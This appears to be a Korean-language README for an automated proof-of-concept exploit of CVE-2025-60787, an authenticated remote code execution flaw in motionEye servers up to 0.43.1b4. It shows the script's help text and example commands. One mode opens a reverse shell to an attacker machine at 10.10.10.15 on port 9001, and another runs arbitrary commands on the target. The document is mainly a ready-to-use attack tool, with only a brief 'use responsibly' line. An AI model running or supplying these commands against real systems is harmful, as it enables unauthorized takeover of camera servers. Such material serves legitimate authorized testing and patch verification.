
CVE-2025-60787에 대한 자동화된 PoC로, 0.43.1b4까지의 motionEye 서버를 대상으로 인증된 원격 코드 실행을 제공하며, 리버스 셸 및 명령 실행 모드를 지원합니다.
PoC for CVE-2025-60787는 motionEye의 인증된 RCE 취약점으로, 영향을 받는 모든 버전(0.43.1b4 포함)에서 동작합니다.
이것은 이 저장소에 설명된 취약점에 대한 자동화된 PoC입니다. prabhatverma47님에게 감사드립니다.
이 스크립트에는 취약점을 악용하는 2개의 명령어가 있습니다. revshell이라는 리버스 셸을 직접 보내는 명령어와, 이 CVE를 악용하여 명령어를 직접 실행하는 command라는 명령어가 있습니다.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
revshell 명령어를 사용하여 셸을 획득합니다. 예:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
여기서 10.10.10.10은 대상 머신(motionEye를 실행 중인 머신), 10.10.10.15는 공격자 머신, 9001은 리버스 셸을 수신하기 위해 리스닝 중인 포트입니다.
리버스 셸 대신 원격으로 다른 명령어를 실행하려면 command 옵션을 사용할 수 있습니다. 예를 들어, 피해 머신에서 ping -c1 10.10.10.15 명령어를 실행하려면:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
여기서 10.10.10.10은 motionEye를 실행 중인 머신입니다.
이 스크립트는 항상 자신의 책임 하에 사용하십시오.
윤리적으로 행동하세요 (: